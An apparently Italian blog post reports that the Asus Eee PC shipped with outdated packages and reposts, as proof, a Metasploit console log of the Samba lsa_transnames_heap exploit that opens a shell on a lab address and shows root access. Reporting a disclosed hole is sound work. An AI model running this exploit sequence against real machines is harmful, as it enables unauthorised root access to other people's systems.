Come ti buco l'Asus Eee...
Ahi ahi ahi...
Il debutto dell'Asus Eee si porta dietro qualche critica di sicurezza per le versioni dei pacchetti installati.
Su http://www.risesecurity.org/ viene presentato un attacco alla Eee dalla A alla Z. Versioni dei pacchetti, individuazione del pacchetto con vulnerabilità, exploit con Metasploit e Shell!
Ecco la prova:
msf exploit(lsa_transnames_heap) > set TARGET 1
TARGET => 1
msf
exploit(lsa_transnames_heap) > exploit
[*] Started bind handler
[*] Creating nop sled....
...
[*] Trying to exploit
Samba with address 0x08415000...
[*] Connecting to the SMB service...
[*] Binding to
12345778-1234-abcd-ef00-0123456789ab:0.0@ncacn_np:192.168.50.10[\lsarpc]
...
[*] Bound to
12345778-1234-abcd-ef00-0123456789ab:0.0@ncacn_np:192.168.50.10[\lsarpc]
...
[*] Calling the vulnerable function...
[+] Server did not respond, this is expected
[*] Command shell session 1 opened (192.168.50.201:33694 -> 192.168.50.10:4444)
msf
exploit(lsa_transnames_heap) > sessions -i 1
[*] Starting
interaction with 1...uname -a
Linux eeepc-rise
2.6.21.4-eeepc #21
Sat Oct 13
12:14:03 EDT 2007 i686 GNU/Linuxiduid=0(root) gid=0(root) egid=65534(nogroup)
groups=65534(nogroup)
Commenti
Posta un commento